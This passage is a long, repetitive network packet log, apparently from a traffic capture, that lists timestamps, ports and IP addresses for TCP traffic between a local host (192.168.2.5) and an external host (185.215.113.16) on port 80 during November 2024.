                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.973481894 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.973495960 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.973500967 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.973509073 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.973519087 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.973542929 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.973556995 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.973578930 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.973591089 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.973602057 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.973613024 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.973639011 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.973862886 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.973912001 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.973922014 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.973932028 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.973953962 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.973978996 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974016905 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974026918 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974037886 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974049091 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974056005 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974061966 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974081993 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974098921 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974111080 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974123001 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974133968 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974143982 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974162102 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974183083 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974211931 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974220991 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974221945 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974261045 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974296093 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974308014 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974318027 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974337101 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974375010 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974385977 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974395990 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974412918 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974419117 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974430084 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974442005 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974463940 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974531889 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974550962 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974564075 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974575043 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974587917 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974591017 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974598885 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974611044 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974617004 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974627972 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974637032 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974651098 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974662066 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974668026 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974695921 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974777937 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974787951 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974824905 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974843979 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974886894 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974899054 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974921942 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974972963 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974983931 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.974996090 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.975006104 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.975008011 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.975022078 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.975033045 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.975038052 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.975059032 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.975281000 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.975291967 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.975303888 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.975327969 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.975341082 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.975342035 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.975353956 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.975377083 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.975385904 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.975388050 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.975420952 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.975802898 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.975821018 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.975833893 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.975845098 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.975857019 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.975868940 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.975879908 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.975923061 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.975969076 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.975997925 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976010084 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976020098 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976047993 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976048946 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976088047 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976100922 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976115942 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976129055 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976149082 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976195097 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976207972 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976219893 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976233006 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976233959 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976244926 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976248980 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976279974 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976466894 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976490974 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976502895 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976519108 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976526976 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976541996 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976550102 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976553917 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976567030 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976578951 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976584911 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976597071 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976609945 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976614952 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976650000 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976654053 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976666927 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976676941 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976689100 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976695061 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976701021 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976716042 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976730108 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976752043 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976780891 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976792097 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976804018 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976815939 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976824045 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976854086 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976946115 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976964951 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976975918 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976985931 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.976996899 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977004051 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977016926 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977029085 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977035999 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977047920 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977052927 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977061987 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977071047 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977087021 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977092028 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977107048 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977114916 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977118969 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977132082 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977143049 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977154016 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977165937 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977169037 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977178097 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977190971 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977202892 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977206945 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977216005 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977226973 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977231026 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977240086 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977251053 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977258921 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977263927 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977286100 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977308989 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977432966 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977483034 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977502108 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977518082 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977521896 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977531910 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977565050 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977787971 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977821112 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977834940 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977845907 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977881908 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977900982 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977905989 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977919102 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.977936029 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978200912 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978240967 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978271008 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978282928 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978319883 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978425026 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978445053 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978458881 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978470087 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978480101 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978482962 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978494883 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978506088 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978509903 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978517056 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978535891 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978547096 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978701115 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978816032 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978828907 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978838921 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978847027 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978848934 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978868008 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978874922 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978888988 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978899956 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978904009 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978909969 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978921890 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978934050 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978934050 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978956938 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978976011 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978987932 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.978997946 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979005098 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979021072 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979032993 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979036093 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979043961 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979058027 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979065895 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979068995 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979091883 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979115009 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979126930 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979137897 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979144096 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979155064 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979170084 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979310036 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979325056 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979350090 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979464054 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979484081 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979496956 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979504108 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979507923 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979521036 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979532003 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979532957 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979546070 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979556084 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979562998 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979569912 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979581118 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979589939 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979592085 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979598999 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979610920 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979618073 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979623079 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979640007 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979650021 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979660988 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979667902 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:18.979672909 CET8049719185.215.113.16192.168.2.5
